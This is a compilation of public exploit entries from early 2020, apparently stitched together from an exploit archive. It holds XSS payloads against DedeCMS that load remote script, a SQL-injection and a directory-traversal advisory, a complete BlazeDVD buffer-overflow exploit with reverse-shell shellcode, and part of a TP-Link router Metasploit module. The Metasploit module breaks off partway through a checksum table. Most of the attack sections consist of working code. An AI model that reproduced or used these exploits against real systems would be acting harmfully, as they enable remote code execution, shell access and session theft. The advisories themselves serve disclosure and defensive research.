& the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Title: DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-15 # Vendor Link: http://www.dedecms.com # Software Link: http://www.dedecms.com/products/dedecms/downloads/ # CVE: N/A Document Title: =============== DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2195 Release Date: ============= 2020-04-09 Vulnerability Laboratory ID (VL-ID): ==================================== 2195 Common Vulnerability Scoring System: ==================================== 4.3 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Welcome to use the most professional PHP website content management system in China-Zhimeng content management system, he will be your first choice for easy website building. Adopt XML name space style core templates: all templates are saved in file form, which provides great convenience for users to design templates and website upgrade transfers. The robust template tags provide strong support for webmasters to DIY their own websites. High-efficiency tag caching mechanism: Allows the caching of similar tags. When generating HTML, it helps to improve the reaction speed of the system and reduce the resources consumed by the system. (Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the official DedeCMS v5.7 SP2 (UTF8) web-application. Affected Product(s): ==================== DesDev Inc. Product: DedeCMS - Content Management System v5.7 SP2 Vulnerability Disclosure Timeline: ================================== 2020-04-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent cross site scripting vulnerabilities has been discovered in the official DedeCMS v5.7 SP2 UTF8 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent script code inject web vulnerabilities are located in the `activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor` and `CKEditorFuncNum`parameters of the `file_pic_view.php`, `file_manage_view.php`, `tags_main.php`, `select_media.php`, `media_main.php` files. The attack vector of the vulnerability is non-persistent and the request method to inject is POST. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable File(s): [+] file_pic_view.php [+] file_manage_view.php [+] tags_main.php [+] select_media.php [+] media_main.php Vulnerable Parameter(s): [+] tag [+] keyword [+] activepath [+] fmdo=move&filename & fmdo=edit&filename [+] CKEditor & CKEditor=body&CKEditorFuncNum Proof of Concept (PoC): ======================= The web vulnerabilities can be exploited by remote attackers with privileged user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Request: Examples https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en PoC: Payload ".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].* onload=alert(document.domain)> >"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png onload=alert(document.domain)"> >"><iframe src=evil.source onload=alert(document.domain)> %22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E %3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E %3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E PoC: Exploitation <title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title> <iframe src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E"> <iframe src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads"> <iframe src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E"> <iframe src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E"> <iframe src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway="> <iframe src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe src=evil.source onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en"> <iframe src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe src=evil.source onload=alert(document.domain)>2&langCode=en"> ... --- PoC Session Logs [POST] --- (Some Examples ...) https://test23.localhost:8080/dede/media_main.php Host: test23.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 152 Origin: https://test23.localhost:8080 Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= Connection: keep-alive Referer: https://test23.localhost:8080/dede/media_main.php Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php keyword=>"%20<<img src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4 - POST: HTTP/2.0 200 OK server: nginx content-type: text/html; charset=utf-8 content-length: 1830 expires: Thu, 19 Nov 1981 08:52:00 GMT pragma: no-cache cache-control: private set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon, 06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/ vary: Accept-Encoding content-encoding: gzip x-powered-by: PHP/5.6.40, PleskLin X-Firefox-Spdy: h2 --- https://test23.localhost:8080/dede/file_pic_view.php ?activepath=%2Fuploads%2F>" <"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0 Host: test23.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= Connection: keep-alive Referer: https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0 Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager Upgrade-Insecure-Requests: 1 - GET: HTTP/2.0 200 OK server: nginx content-type: text/html; charset=utf-8 x-powered-by: PHP/5.6.40 expires: Thu, 19 Nov 1981 08:52:00 GMT pragma: no-cache cache-control: private X-Firefox-Spdy: h2 --- https://test23.localhost:8080/include/dialog/select_media.php? CKEditor=>"><iframe src=evil.source onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source onload=alert("2")>2&langCode=en Host: test23.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= Connection: keep-alive Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php Upgrade-Insecure-Requests: 1 - GET: HTTP/2.0 200 OK server: nginx content-type: text/html; charset=utf-8 content-length: 1137 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache vary: Accept-Encoding content-encoding: gzip x-powered-by: PHP/5.6.40, PleskLin X-Firefox-Spdy: h2 Reference(s): https://test23.localhost:8080/dede/media_main.php https://test23.localhost:8080/dede/tags_main.php https://test23.localhost:8080/dede/file_pic_view.php https://test23.localhost:8080/dede/file_manage_view.php https://test23.localhost:8080/include/dialog/select_media.php Solution - Fix & Patch: ======================= 1. Parse the content to disallow html / js and special chars on the affected input fields 2. Restrict the vulnerable paramter prevent injects via post method request 3. Secure the output location were the content is insecure sanitized delivered as output Security Risk: ============== The security risk of the application-side persistent cross site scripting web vulnerabilities in the different modules are estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ --

# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection # Google Dork: "LMS v3.0 - Xerone IT " # Date: 2020-04-09 # Exploit Author: Sohel Yousef jellyfish security team # Software Link: https://xeroneit.net/portfolio/library-management-system-lms # Software Demo :https://xeroneit.co/demo/lms/home/login # Version: v3.0 # Category: webapps 1. Description scritp has SQLI in books category at this dir /lms/home/book?category_name=00*SQLI Error Number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3 SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as available_book, `book_info`.`number_of_books`, `book_info`.`id`, `book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as `size`, `book_info`.`publishing_year`, `book_info`.`publisher`, `book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`, `book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`, `book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'', category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21 Filename: models/Basic.php Line Number: 284

# Title: File Transfer iFamily 2.1 - Directory Traversal # Author: Vulnerability Laboratory # Date: 2020-04-15 # Software Link: http://www.dedecms.com/products/dedecms/downloads/ # CVE: N/A Document Title: =============== File Transfer iFamily v2.1 - Directory Traversal Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2199 Release Date: ============= 2020-04-14 Vulnerability Laboratory ID (VL-ID): ==================================== 2199 Common Vulnerability Scoring System: ==================================== 7.1 Vulnerability Class: ==================== Directory- or Path-Traversal Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Send photos, videos and documents to other devices without Internet. A complete application to exchange files wirelessly between devices. It uses the Multipeer Connectivity Framework to search and connect to available devices, without the need of internet connection or any kind of server and database. (Copy of the Homepage: https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official File Transfer iFamily v2.1 ios mobile application. Affected Product(s): ==================== DONG JOO CHO Product: File Transfer iFamily v2.1 - iOS Mobile Web Application Vulnerability Disclosure Timeline: ================================== 2020-04-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Pre auth - no privileges User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A directory traversal web vulnerability has been discovered in the official File Transfer iFamily v2.1 ios mobile application. The vulnerability allows remote attackers to change the application path in performed requests to compromise the local application or file-system of a mobile device. Attackers are for example able to request environment variables or a sensitive system path. The directory-traversal web vulnerability is located in the main application path request performed via GET method. Attackers are able to request for example the local ./etc/ path of the web-server by changing the local path in the performed request itself. In a first request the attack changes the path, the host redirects to complete the adress with "..". Then the attacker just attaches a final slash to its request and the path can be accessed via web-browser to download local files. Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise. Proof of Concept (PoC): ======================= The directory traversal vulnerability can be exploited by attackers with access to the wifi interface in a local network without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Exploitation http://localhost/../../../../../../../../../../../../../../../../../../../../../../ http://localhost//../ --- PoC Session Logs [GET]] --- http://localhost/../../../../../../../../../../../../../../../../../../../../../../ Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 2521 - http://localhost../etc/ Host: localhost.. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 - add slash to correct host adress (/.././) http://localhost/./ Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 - Access granted http://localhost/../../../../../../../../../../../../../../../../../../../../../../ GET: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 2521 Solution - Fix & Patch: ======================= The vulnerability can be patched by a restriction of the visible and accessable ./etc/ path in the app container. Disallow path changes in the client-side get method requests and validate them securely. Security Risk: ============== The security risk of the directory travsersal web vulnerability in the ios mobile application is estimated as high. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH) # Date: 2020-04-15 # Exploit Author: areyou1or0 <Busra Demir> # Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html # Version: 7.0.2 # Tested on: Windows 7 Pro x86 #!/usr/bin/python file = "exploit.plf" offset ="A"*(612-4) nseh = "\xeb\x1e\x90\x90" seh = "\x34\x31\x02\x64" nops = "\x90" * 24 # msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff' shellcode = "" shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a" shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37" shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62" shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46" shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b" shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34" shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51" shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64" shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67" shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36" shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61" shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c" shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39" shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c" shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61" shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44" shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d" shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45" shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b" shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47" shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44" shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52" shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b" shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64" shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72" shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44" shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30" shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56" shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30" shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76" shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f" shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e" shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72" shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52" shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f" shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70" shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35" shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32" shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67" shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33" shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54" shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66" shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36" shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76" shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f" shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33" shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47" shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58" shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d" shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56" shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b" shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61" shellcode += "\x43\x49\x6f\x68\x55\x41\x41" buffer = offset + nseh + seh + nops + shellcode f = open(file,'w') f.write(buffer) f.close()

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'openssl' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution', 'Description' => %q{ This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726. The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command as root, including downloading and executing a binary from another host. This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + Radek Domanski). }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module 'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'], [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'], [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'], [ 'CVE', '2020-10882'], [ 'CVE', '2020-10883'], [ 'CVE', '2020-10884'], [ 'ZDI', '20-334'], [ 'ZDI', '20-335'], [ 'ZDI', '20-336' ] ], 'Privileged' => true, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'Payload' => {}, 'Stance' => Msf::Exploit::Stance::Aggressive, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp', 'WfsDelay' => 15, }, 'Targets' => [ [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)',{} ] ], 'DisclosureDate' => "Mar 25 2020", 'DefaultTarget' => 0, ) ) register_options( [ Opt::RPORT(20002) ]) register_advanced_options( [ OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15]) ]) end def check begin res = send_request_cgi({ 'uri' => '/webpages/app.1564127413977.manifest', 'method' => 'GET', 'rport' => 80 }) if res && res.code == 200 return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionError pass end return Exploit::CheckCode::Unknown end def calc_checksum(packet) # reference table used to calculate the packet checksum # used by tdpd_pkt_calc_checksum (0x4037f0) # located at offset 0x0416e90 in the binary reference_tbl = [0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee, 0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba, 0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4, 0x8f, 0xe9, 0x63, 0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3, 0x0e, 0xdb, 0x88, 0x32, 0x79, 0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88, 0x09, 0xb6, 0x4c, 0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91, 0x1d, 0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41, 0xde, 0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83, 0xd3, 0x85, 0xc7, 0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9, 0x7a, 0x8a, 0x65, 0xc9, 0xec, 0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa, 0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5, 0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10, 0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72, 0x3c, 0x03, 0xe4, 0xd1, 0x4b, 0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b, 0x35, 0xb5, 0xa8, 0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40, 0x32, 0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d, 0x59, 0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf, 0xd0, 0x61, 0x16, 0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95, 0x99, 0xb8, 0xbd, 0xa5, 0x0f, 0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6, 0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24, 0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c, 0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d, 0x76, 0xdc, 0x41, 0x90, 0x01, 0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a, 0x71, 